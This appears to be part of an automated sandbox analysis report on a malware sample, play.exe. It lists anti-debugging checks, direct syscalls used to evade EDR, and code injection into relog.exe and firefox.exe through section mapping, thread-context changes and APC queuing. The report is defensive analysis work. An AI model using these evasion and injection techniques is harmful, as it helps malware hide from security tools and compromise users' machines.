Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h]	0_2_026CCA6F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h]	0_2_026CCA6F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273EA60 mov eax, dword ptr fs:[00000030h]	0_2_0273EA60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0A5B mov eax, dword ptr fs:[00000030h]	0_2_026A0A5B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0A5B mov eax, dword ptr fs:[00000030h]	0_2_026A0A5B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEA2E mov eax, dword ptr fs:[00000030h]	0_2_026BEA2E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA24 mov eax, dword ptr fs:[00000030h]	0_2_026CCA24
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B4A35 mov eax, dword ptr fs:[00000030h]	0_2_026B4A35
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B4A35 mov eax, dword ptr fs:[00000030h]	0_2_026B4A35
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271CA11 mov eax, dword ptr fs:[00000030h]	0_2_0271CA11
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CAAEE mov eax, dword ptr fs:[00000030h]	0_2_026CAAEE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CAAEE mov eax, dword ptr fs:[00000030h]	0_2_026CAAEE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h]	0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h]	0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h]	0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690AD0 mov eax, dword ptr fs:[00000030h]	0_2_02690AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4AD0 mov eax, dword ptr fs:[00000030h]	0_2_026C4AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4AD0 mov eax, dword ptr fs:[00000030h]	0_2_026C4AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698AA0 mov eax, dword ptr fs:[00000030h]	0_2_02698AA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698AA0 mov eax, dword ptr fs:[00000030h]	0_2_02698AA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6AA4 mov eax, dword ptr fs:[00000030h]	0_2_026E6AA4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764A80 mov eax, dword ptr fs:[00000030h]	0_2_02764A80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8A90 mov edx, dword ptr fs:[00000030h]	0_2_026C8A90
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268CB7E mov eax, dword ptr fs:[00000030h]	0_2_0268CB7E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273EB50 mov eax, dword ptr fs:[00000030h]	0_2_0273EB50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02738B42 mov eax, dword ptr fs:[00000030h]	0_2_02738B42
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726B40 mov eax, dword ptr fs:[00000030h]	0_2_02726B40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726B40 mov eax, dword ptr fs:[00000030h]	0_2_02726B40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275AB40 mov eax, dword ptr fs:[00000030h]	0_2_0275AB40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688B50 mov eax, dword ptr fs:[00000030h]	0_2_02688B50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744B4B mov eax, dword ptr fs:[00000030h]	0_2_02744B4B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744B4B mov eax, dword ptr fs:[00000030h]	0_2_02744B4B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEB20 mov eax, dword ptr fs:[00000030h]	0_2_026BEB20
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEB20 mov eax, dword ptr fs:[00000030h]	0_2_026BEB20
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02758B28 mov eax, dword ptr fs:[00000030h]	0_2_02758B28
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02758B28 mov eax, dword ptr fs:[00000030h]	0_2_02758B28
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764B00 mov eax, dword ptr fs:[00000030h]	0_2_02764B00
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271CBF0 mov eax, dword ptr fs:[00000030h]	0_2_0271CBF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEBFC mov eax, dword ptr fs:[00000030h]	0_2_026BEBFC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h]	0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h]	0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698BF0 mov eax, dword ptr fs:[00000030h]	0_2_02698BF0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h]	0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h]	0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B0BCB mov eax, dword ptr fs:[00000030h]	0_2_026B0BCB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273EBD0 mov eax, dword ptr fs:[00000030h]	0_2_0273EBD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h]	0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h]	0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690BCD mov eax, dword ptr fs:[00000030h]	0_2_02690BCD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744BB0 mov eax, dword ptr fs:[00000030h]	0_2_02744BB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744BB0 mov eax, dword ptr fs:[00000030h]	0_2_02744BB0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0BBE mov eax, dword ptr fs:[00000030h]	0_2_026A0BBE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0BBE mov eax, dword ptr fs:[00000030h]	0_2_026A0BBE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726870 mov eax, dword ptr fs:[00000030h]	0_2_02726870
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726870 mov eax, dword ptr fs:[00000030h]	0_2_02726870
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E872 mov eax, dword ptr fs:[00000030h]	0_2_0271E872
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E872 mov eax, dword ptr fs:[00000030h]	0_2_0271E872
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A2840 mov ecx, dword ptr fs:[00000030h]	0_2_026A2840
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694859 mov eax, dword ptr fs:[00000030h]	0_2_02694859
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694859 mov eax, dword ptr fs:[00000030h]	0_2_02694859
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0854 mov eax, dword ptr fs:[00000030h]	0_2_026C0854
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273483A mov eax, dword ptr fs:[00000030h]	0_2_0273483A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273483A mov eax, dword ptr fs:[00000030h]	0_2_0273483A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA830 mov eax, dword ptr fs:[00000030h]	0_2_026CA830
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov ecx, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B2835 mov eax, dword ptr fs:[00000030h]	0_2_026B2835
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C810 mov eax, dword ptr fs:[00000030h]	0_2_0271C810
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A8E4 mov eax, dword ptr fs:[00000030h]	0_2_0275A8E4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC8F9 mov eax, dword ptr fs:[00000030h]	0_2_026CC8F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC8F9 mov eax, dword ptr fs:[00000030h]	0_2_026CC8F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE8C0 mov eax, dword ptr fs:[00000030h]	0_2_026BE8C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027608C0 mov eax, dword ptr fs:[00000030h]	0_2_027608C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C89D mov eax, dword ptr fs:[00000030h]	0_2_0271C89D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690887 mov eax, dword ptr fs:[00000030h]	0_2_02690887
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D096E mov eax, dword ptr fs:[00000030h]	0_2_026D096E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D096E mov edx, dword ptr fs:[00000030h]	0_2_026D096E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D096E mov eax, dword ptr fs:[00000030h]	0_2_026D096E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h]	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h]	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B6962 mov eax, dword ptr fs:[00000030h]	0_2_026B6962
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734978 mov eax, dword ptr fs:[00000030h]	0_2_02734978
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734978 mov eax, dword ptr fs:[00000030h]	0_2_02734978
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C97C mov eax, dword ptr fs:[00000030h]	0_2_0271C97C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764940 mov eax, dword ptr fs:[00000030h]	0_2_02764940
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02710946 mov eax, dword ptr fs:[00000030h]	0_2_02710946
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0272892B mov eax, dword ptr fs:[00000030h]	0_2_0272892B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271892A mov eax, dword ptr fs:[00000030h]	0_2_0271892A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C912 mov eax, dword ptr fs:[00000030h]	0_2_0271C912
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688918 mov eax, dword ptr fs:[00000030h]	0_2_02688918
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688918 mov eax, dword ptr fs:[00000030h]	0_2_02688918
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E908 mov eax, dword ptr fs:[00000030h]	0_2_0270E908
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E908 mov eax, dword ptr fs:[00000030h]	0_2_0270E908
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E9E0 mov eax, dword ptr fs:[00000030h]	0_2_0271E9E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C29F9 mov eax, dword ptr fs:[00000030h]	0_2_026C29F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C29F9 mov eax, dword ptr fs:[00000030h]	0_2_026C29F9
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275A9D3 mov eax, dword ptr fs:[00000030h]	0_2_0275A9D3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027269C0 mov eax, dword ptr fs:[00000030h]	0_2_027269C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269A9D0 mov eax, dword ptr fs:[00000030h]	0_2_0269A9D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C49D0 mov eax, dword ptr fs:[00000030h]	0_2_026C49D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027189B3 mov esi, dword ptr fs:[00000030h]	0_2_027189B3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027189B3 mov eax, dword ptr fs:[00000030h]	0_2_027189B3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027189B3 mov eax, dword ptr fs:[00000030h]	0_2_027189B3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026909AD mov eax, dword ptr fs:[00000030h]	0_2_026909AD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026909AD mov eax, dword ptr fs:[00000030h]	0_2_026909AD
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A29A0 mov eax, dword ptr fs:[00000030h]	0_2_026A29A0

Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BE70C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00BE70C8
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_00BE8B7B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00BE8B7B

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenKeyEx: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryValueKey: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtTerminateThread: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\play.exe	Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\play.exe	Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread register set: target process: 7852

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread APC queued: target process: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: aAqvujXSGNo.exe, 00000004.00000000.1977051343.0000000001900000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104240210.0000000001901000.00000002.00000001.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000000.2132144202.00000000014D0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
